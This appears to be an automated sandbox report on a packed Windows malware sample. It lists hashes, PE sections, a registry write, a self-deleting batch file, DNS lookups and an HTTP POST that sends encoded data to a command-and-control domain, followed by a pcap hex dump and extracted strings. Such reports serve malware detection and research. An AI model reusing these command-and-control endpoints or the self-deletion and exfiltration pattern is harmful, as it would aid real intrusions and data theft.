Analysis Date: 2014-08-25 15:01:12
MD5: 09e25c6a03ff716999f7894e7bdb73d3
SHA1: aa0ea9e69db511b8e17d76017ab063af96144c5b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .qLawXP md5: 4913119bd211773391483c9d69d65f54 sha1: cdb00f25c927499dde6ed3a23d86929f2598dd87 size: 16384
Section: .RNwPz md5: 739eb35e869ba635d11be33f08edf6a6 sha1: 9c2cf1489f30de4ee360605c54cf725e51a785e1 size: 29184
Section: .afyh md5: 21eb7229dde310fab9cd2dbec6208123 sha1: df728df8c047ff7589d48aaa00c65cd88d0550c5 size: 7168
Section: .CuzShI md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section: .HUnns md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section: .rsrc md5: ca9ccc2ebba0bd5252bfbed45529284b sha1: e2323752e335357ef6277bddef06ae44059ae084 size: 1024
Timestamp: 2008-07-20 18:22:54
Packer: Safeguard 1.03 -> Simonzh
PEhash: 6f8772629912c47a67fa7677157f9cf064a12d5c
IMPhash: 8474298a3497aeaba48dd2918737e704

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝ 15000
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates Process: C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates File: nul
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Deletes File: C:\malware.exe

Network Details:

DNS: reportsystem32.com
Type: A
208.73.211.174
DNS: reportsystem32.com
Type: A
208.73.211.233
DNS: reportsystem32.com
Type: A
208.73.211.235
DNS: reportsystem32.com
Type: A
208.73.211.246
DNS: reportsystem32.com
Type: A
208.73.210.219
DNS: terradataweb.com
Type: A
DNS: dvdisorapid.com
Type: A
HTTP POST: http://reportsystem32.com/senm.php?data=v22MyTS3QIzyWmdivlZDFrtobLbmd4E7b4JZHHciKhpSXlXSjBXcnjr3VFrHIQqMgMqV7JkUfg==
User-Agent: wget 3.0
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.174:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7365 6e6d2e70 68703f64   POST /senm.php?d
0x00000010 (00016)   6174613d 7632324d 79545333 51497a79   ata=v22MyTS3QIzy
0x00000020 (00032)   576d6469 766c5a44 4672746f 624c626d   WmdivlZDFrtobLbm
0x00000030 (00048)   64344537 62344a5a 48486369 4b687053   d4E7b4JZHHciKhpS
0x00000040 (00064)   586c5853 6a425863 6e6a7233 56467248   XlXSjBXcnjr3VFrH
0x00000050 (00080)   4951714d 674d7156 374a6b55 66673d3d   IQqMgMqV7JkUfg==
0x00000060 (00096)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000070 (00112)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000080 (00128)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000090 (00144)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000a0 (00160)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000b0 (00176)   656e743a 20776765 7420332e 300d0a48   ent: wget 3.0..H
0x000000c0 (00192)   6f73743a 20726570 6f727473 79737465   ost: reportsyste
0x000000d0 (00208)   6d33322e 636f6d0d 0a436f6e 74656e74   m32.com..Content
0x000000e0 (00224)   2d4c656e 6774683a 2033330d 0a436f6e   -Length: 33..Con
0x000000f0 (00240)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000100 (00256)   6976650d 0a436163 68652d43 6f6e7472   ive..Cache-Contr
0x00000110 (00272)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000120 (00288)   64617461 3d756a6e 5433324f 2f463971   data=ujnT32O/F9q
0x00000130 (00304)   73447941 7a36566c 4d533735 33502f55   sDyAz6VlMS753P/U
0x00000140 (00320)   3d                                    =


Strings
.
.P J
..
..
jF+[
0g*&NI
1Q}Z7l"
_1$yeVU
2ImageList_DragMove
:3&T*w	+
3yI8	Q=
4|2P}`q
.#4>nfFPP
)_4+ZN~
#/*5}5
5DialogBoxParamW
}^5dMF	
5kP7%nPs
-7gP-p
7QYjBv
8^9`DS
8Mz<_/
9ImageList_DragShowNolock
a`' 7x
advapi32.dll
a#Lf!eV>
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
bBlockInput
BGetCursor
bO;(~aL l
{c/2YB
CalcMenuBar
[:\cap
]c-Hiu
CNCopyRect
comctl32.dll
CopyImage
cpR;+6EzE
.CuzShI
\(_d@7
deb2l=
/dnpTC
DrawTextW
dxionn
dxyq8L
E)lJhi7
F3RegQueryValueA
f$9&e*
@fCo.l&
%fGetDlgItem
F GetStdHandle
FreeLibrary
Fr `OF
FT^qRx
-fz1:8
(gC:ET
gChT\(2
GetCommandLineA
GetCPInfo
GetFileSize
GetFileType
GetLastError
;GetLocalTime
GF]1eg
GlobalFree
gVE5:/
!??gW&p
HAyEnnn
HeapAlloc
hF~#R\
HO7B}2
@.HUnns
hvq{vO
i2~mS!Y
i`lh)t'
ImageList_AddIcon
ImageList_BeginDrag
"&ImageList_Copy
ImageList_Destroy
ImageList_EndDrag
:ImageList_GetDragImage
!ImageList_GetIcon
ImageList_GetImageInfo
ImageList_LoadImage
ImageList_LoadImageW
ImageList_Merge
ImageList_Read
& ImageList_Replace
ImageList_ReplaceIcon
InsertMenuA
IRegEnumKeyA
IsMenu
J)hA]R
JUGetWindowTextA
^|K&,)
%Kc @l
kDrawIcon
kernel32.dll
}k?_p$
Kqm8.GB
k</U'%
{}L7=2SF23
*LoadCursorA
(LoadMenuA
"lstrcatA
lstrcmpA
lstrcpyA
lstrcpynA
lstrlenA
M}22KC
MDDQ<.
}MeCjp
*noU*n
|:npDt
nuUnc5
;;N#/wI
^'O4LRfNPS
ODialogBoxParamA
pdW@F>~
Por:BU[
P]$'rTjl
ps50Hq
@P!;V'
PZ(^pB
q:=}+>
Q3q)I8
;+q:5Oj
*q=?60+
.qLawXP
qMIE8s
?,qU>i
qvb	:V
qvxmu<X
@?Q"*ZQ
 &R\\~
*r8U<G
R+A&xM!
RegCreateKeyExA
RegCreateKeyExW
RegDeleteKeyA
[RegDeleteKeyW
RegDeleteValueA
RegEnumKeyExA
RegEnumKeyExW
RegEnumKeyW
RegFlushKey
RegOpenKeyA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
{RegQueryValueExW
RegReplaceKeyA
RegReplaceKeyW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
RhfgZP
R>J'wwD
`.RNwPz
@.rsrc
Rt,_B#
S3mz*;
s,*7)UU
~Sb<|&
}S*>+bl
      </security>
      <security>
>Sleep
"~SxzU
sY<Kdb
-T;DPI
!This program cannot be run in DOS mode.
tmP=~nm
t'N8*@
*TP~5XJ'
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
TW+f=0
UDux6j
uGetStringTypeA
ur+F+	
user32.dll
^uW'gT
v|KEr!
VRAppendMenuW
vv|??&x
Vz4^6L
wBuBH	y
W_"FAG
w@[F@)T$
wHyTr[+
#wI{;{
WideCharToMultiByte
*wN4_g
\x/`!!
x3nnnyW
x^!6`w
+X&E'nm
xjonnHA
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
XRJQ>,
Xy]nnn
YDeleteFileA
y!Jejy2]
yo7_$r-
'Y-O/ZI
Z70yd^